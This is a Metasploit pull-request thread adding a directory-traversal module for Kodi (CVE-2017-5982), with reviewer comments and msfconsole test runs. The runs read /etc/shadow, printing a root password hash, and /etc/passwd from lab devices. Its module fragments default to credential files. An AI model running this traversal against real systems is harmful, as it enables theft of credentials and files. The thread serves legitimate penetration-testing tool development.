
Add a sploit for CVE-2017-5982 #7980

Merged
merged 2 commits into from
Feb 22, 2017

Conversation


@jvoisin jvoisin commented Feb 19, 2017

This PR implements a module for CVE-2017-5982 for the Kodi media center, loosely based on auxiliary/scanner/http/clansphere_traversal.

Verification

List the steps needed to make sure this thing works

  • Get a working Kodi setup. I used LibreELEC since I'm lazy and it just works™
  • Start msfconsole
  • use auxiliary/scanner/http/kodi_traversal
  • Set RPORT and RHOSTS
  • run
  • Verify that you get the file you requested

Complete run

msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > info 

       Name: Kodi 17.1 Local File Inclusion Vulnerability
     Module: auxiliary/scanner/http/kodi_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-02-12

Provided by:
  Eric Flokstra
  jvoisin

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      10               yes       The max traversal depth to root directory
  FILE       /etc/shadow      yes       The file to obtain
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.0.31     yes       The target address range or CIDR identifier
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path to the web application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal flaw found in Kodi 17.1.

References:
  https://cvedetails.com/cve/CVE-2017-5982/

msf auxiliary(kodi_traversal) > show options 

Module options (auxiliary/scanner/http/kodi_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILE       /etc/shadow      yes       The file to obtain
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(kodi_traversal) > set RPORT 8080
RPORT => 8080
msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
RHOSTS => 192.168.0.31
msf auxiliary(kodi_traversal) > run

[*] Reading '/etc/shadow'
[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219213028_default_192.168.0.31_kodi_812537.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf >  cat /home/jvoisin/.msf4/loot/20170219213100_default_192.168.0.31_kodi_464790.bin
[*] exec:  cat /home/jvoisin/.msf4/loot/20170219213100_default_192.168.0.31_kodi_464790.bin

systemd-network:*:::::::
root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
nobody:*:::::::
dbus:*:::::::
system:*:::::::
sshd:*:::::::
avahi:*:::::::
msf > 


void-in commented Feb 20, 2017

Is the application running with root privileges? /etc/shadow can only be read by root. /etc/passwd would be a better choice for non-root users.


jvoisin commented Feb 20, 2017

It depends on the deployment, but a lot of people are running it on a super-light Linux (like LibreELEC, OpenELEC, …), with everything running as root.

@@ -0,0 +1,40 @@
## Vulnerable Application

This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.
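Review bot: the affected-version statement is inconsistent across this PR: this line says "Kodi 17.1", the install step below says "You'll need a version lower than 17.1", and the module's own Description in the testing output later in this thread says "Kodi before 17.1". Pick one affected range, naming the first fixed release, and use the same wording in this paragraph and in the module's Name and Description so a user can tell a vulnerable target from a patched one.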

This says <= 17.1

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).

You'll need a version lower than 17.1.
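Review bot: "Grab whatever image from libreelec" is not reproducible and will stop working as soon as libreelec.tv/downloads serves only patched builds; name a specific LibreELEC release and the Kodi version it ships (the testing later in this thread used LibreELEC-RPi2.arm-7.0.3.img.gz). The requirement line should also say which project the number applies to: "a version lower than 17.1" reads as a Kodi version while the link above it is a LibreELEC image.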

This says <17.1. Is 17.1 vuln?

@@ -0,0 +1,40 @@
## Vulnerable Application

This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.

Generally I like to link to a zip or tgz here if possible.


**Vulnerable Application Installation Steps**

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
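Review bot: "**Vulnerable Application Installation Steps**" is bold text where the rest of this file uses markdown headings ("## Vulnerable Application", "## Verification Steps"); make it a heading one level down, e.g. "### Vulnerable Application Installation Steps", so the file's outline stays consistent.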

I get that LibreELEC is a Kodi image essentially, but it'd be nice to just have a quick thing here. Right now it looks like we're exploiting Kodi but then LibreELEC comes out of left field.

I'd also like to see a LibreELEC build here that is known vuln, for future-proofing. In 5 years this line won't change and someone will try a non-vuln version.

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).

You'll need a version lower than 17.1.

Version of LibreELEC or Kodi?


## Verification Steps

A successful check of the exploit will look like this:
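Review bot: "A successful check of the exploit" is misleading on two counts: the module is an auxiliary scanner that is executed with `run`, and `check` is a separate msfconsole command, so the sentence suggests a check action that the verification steps never invoke. Reword to "A successful run of the module will look like this:".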

Change check to run since check is a command; we don't want confusion.

system:*:::::::
sshd:*:::::::
avahi:*:::::::
msf auxiliary(kodi_traversal) > info
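Review bot: the trailing `msf auxiliary(kodi_traversal) > info` after the retrieved file contents is a leftover prompt from the session capture that starts a command whose output is not shown; drop it and the blank line that follows so the transcript ends on the last line of the file (`avahi:*:::::::`). Since these lines are shadow-file entries, consider recording the sample run against a world-readable file such as /etc/passwd instead, so the doc does not carry credential material from the test box.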

Get rid of this line and the next empty one.

register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
OptString.new('FILE', [true, 'The file to obtain', '/etc/shadow']),
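Review bot: defaulting FILE to '/etc/shadow' means a run against any Kodi instance that is not running as root reports failure even though the traversal itself works, so the scanner misses vulnerable hosts by default; default to '/etc/passwd', which every user can read, and leave FILE for people who want a different file. This matches the point @void-in raised above and the '/etc/passwd' default shown in the merged module's info output later in this thread.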

Per @void-in, if this is typically run as root this line is fine. If not, maybe it should be /etc/passwd, or the file (db) with the logins for Kodi.

print_good("#{fname} stored as '#{p}'")

else
print_error("Fail to obtain file for some unknown reason")
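Review bot: `print_error("Fail to obtain file for some unknown reason")` double-quotes a string with no interpolation; the other literals in this file use single quotes, which is also the framework's Ruby style. The message should also say what was observed rather than "some unknown reason": report the HTTP status code when a response came back, or that no response was received, so a user can distinguish a patched target from a connectivity problem; and "Fail" should read "Failed".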

Change " to ' here.

@bwatters-r7 bwatters-r7 self-assigned this Feb 22, 2017
@bwatters-r7 bwatters-r7 merged commit 73eed10 into rapid7:master Feb 22, 2017
@bwatters-r7

Testing

Using http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz on rpi v2

msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > info

       Name: Kodi 17.0 Local File Inclusion Vulnerability
     Module: auxiliary/scanner/http/kodi_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-02-12

Provided by:
  Eric Flokstra
  jvoisin

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      10               yes       The max traversal depth to root directory
  FILE       /etc/passwd      yes       The file to obtain
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path to the web application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal flaw found in Kodi before 
  17.1.

References:
  https://cvedetails.com/cve/CVE-2017-5982/

msf auxiliary(kodi_traversal) > set rport 8080
rport => 8080
msf auxiliary(kodi_traversal) > set rhosts <Rpi_IP>
rhosts => <Rpi_IP>
msf auxiliary(kodi_traversal) > show options

Module options (auxiliary/scanner/http/kodi_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      10               yes       The max traversal depth to root directory
   FILE       /etc/passwd      yes       The file to obtain
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     <Rpi_IP>  yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(kodi_traversal) > run

[*] Reading '/etc/passwd'
[+] /etc/passwd stored as '/home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(kodi_traversal) > cat /home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin
[*] exec: cat /home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin

systemd-network:x:193:193:systemd-network:/:/bin/sh
root:x:0:0:Root User:/storage:/bin/sh
nobody:x:65534:65534:Nobody:/:/bin/sh
dbus:x:81:81:System message bus:/:/bin/sh
system:x:430:430:service:/var/run/connman:/bin/sh
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/bin/sh
avahi:x:495:495:avahi-daemon:/var/run/avahi-daemon:/bin/sh
msf auxiliary(kodi_traversal) > 


bwatters-r7 commented Feb 22, 2017

Release Notes

The Kodi 17.0 Local File Inclusion Vulnerability module has been added to the framework. It takes advantage of a directory traversal vulnerability in the popular Kodi streaming OS/Application suite to allow arbitrary file downloads from an unpatched system.

@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Mar 6, 2017
Labels: module, needs-docs, rn-enhancement (release notes enhancement)